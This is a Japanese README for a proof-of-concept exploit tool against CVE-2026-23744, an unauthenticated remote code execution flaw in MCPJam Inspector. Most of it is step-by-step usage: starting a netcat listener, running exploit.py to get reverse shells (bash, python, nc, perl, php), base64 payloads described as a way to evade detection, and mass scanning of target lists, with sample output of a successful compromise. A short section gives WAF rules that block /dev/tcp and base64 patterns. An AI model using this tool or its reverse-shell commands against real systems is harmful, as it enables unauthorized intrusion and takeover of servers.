
CVE-2026-23744 - MCPJam Inspector Remote Code Execution(RCE)脆弱性の概念実証エクスプロイトです。このツールは、バージョン1.4.2以下のセキュリティ上の欠陥を実証し、セキュリティ研究者がパッチを検証するのに役立ちます。許可されたテストおよび教育目的のみに使用してください。複数のペイロードオプション、コマンド実行、セッション管理を含みます。
このツールは、許可されたセキュリティテストおよび教育目的のみに使用してください。不正使用は違法です。利用者はすべての行動に対する責任を負います。
このリポジトリには、CVE-2026-23744 の概念実証エクスプロイトが含まれています。これは、MCPJam Inspector バージョン <=1.4.2 で見つかった認証不要のリモートコード実行 (RCE) 脆弱性です。この脆弱性の CVSS スコアは 9.8 (Critical) で、ネットワーク経由の攻撃ベクトルによる深刻なリスクを示しています。
| 属性 | 詳細 |
|---|---|
| CVE ID | CVE-2026-23744 |
| 脆弱性 | 認証不要のリモートコード実行 |
| 影響を受けるバージョン | <=1.4.2 |
| CVSS スコア | 9.8 (Critical) |
| 攻撃ベクトル | ネットワーク |
このエクスプロイトツールは、効果的なセキュリティテストのために設計された包括的な機能セットを提供します。
エクスプロイトツールをセットアップするには、次の手順に従ってください。
リポジトリをクローン:
git clone https://github.com/CerberusMrXi/CVE-2026-23744-MCPJam-RCE-Exploit.git
cd CVE-2026-23744-MCPJam-RCE-Exploit
依存関係をインストール:
pip install -r requirements.txt
基本エクスプロイトを開始するには、まずリスナーをセットアップし、次にエクスプロイトスクリプトを実行します。
# リスナーを起動
nc -lvnp 4444
# エクスプロイトを実行
python exploit.py -u http://target-ip:8080 -l attacker-ip -p 4444
単一のコマンドまたはファイルからのコマンドを実行します。
# 単一のコマンドを実行
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -c "id; whoami"
# ファイルからコマンドを実行
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -C commands.txt
さまざまなシナリオに対応するために、複数のペイロードタイプを利用します。
# Python リバースシェル
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t python
# Netcat リバースシェル
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t nc
# Base64 エンコードペイロード
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t base64
複数のターゲットをスキャンして脆弱性を確認します。
# ターゲットファイルを作成
echo "http://192.168.1.10:8080" > targets.txt
echo "http://192.168.1.11:8080" >> targets.txt
# 脆弱なターゲットをスキャン
python exploit.py -f targets.txt -l 10.0.0.5 -p 4444 --scan
フィンガープリンティング、プロキシ使用、詳細モード、自動リスナー設定などの高度な機能を探索します。
# フィンガープリンティングあり
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --fingerprint
# プロキシあり
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --proxy http://127.0.0.1:8080
# 詳細モード
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -v
# 自動リスナー
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --listen
[+] Starting enhanced exploit against http://192.168.1.100:8080
[+] Reverse shell to 10.0.0.5:4444
[*] Session ID: AbCdEfGh
[*] Fingerprinting target...
[+] Target OS: Ubuntu
[+] Available capabilities: python3, perl, nc
[*] Executing exploit...
[+] Exploit successful!
[!] Check your netcat listener on 10.0.0.5:4444
CVE-2026-23744 から保護するためには、以下の即時対応が重要です。
/api/mcp/connect への不審な POST リクエストを監視する。一般的な悪意のあるパターンをブロックする Nginx WAF ルールの例:
location /api/mcp/connect {
if ($request_body ~* "bash.*/dev/tcp") { return 403; }
if ($request_body ~* "base64.*-d") { return 403; }
proxy_pass http://backend;
}
Q: 使用するのは合法ですか?
A: このツールは、自分が所有しているか、明示的な書面による許可を得てテストするシステムに対してのみ合法的に使用できます。
Q: どのシステムが脆弱ですか?
A: MCPJam Inspector バージョン <=1.4.2 が脆弱です。
Q: システムを保護するにはどうすればよいですか?
A: 直ちに MCPJam Inspector をバージョン >1.4.2 にアップグレードしてください。
Sudeepa Wanigarathna
このツールの不正使用は違法であり、以下のような深刻な結果を招く可能性があります。
Sudeepa Wanigarathna によって ❤️ を込めて作成されました。
| タイプ | コマンド | 最適な用途 |
|---|
bash | Bash リバースシェル | ほとんどの Linux システム |
python | Python3 リバースシェル | Python がインストールされているシステム |
nc | Netcat リバースシェル | netcat があるシステム |
perl | Perl リバースシェル | Perl がインストールされているシステム |
php | PHP リバースシェル | PHP がインストールされているシステム |
base64 | Base64 エンコード | 検出回避 |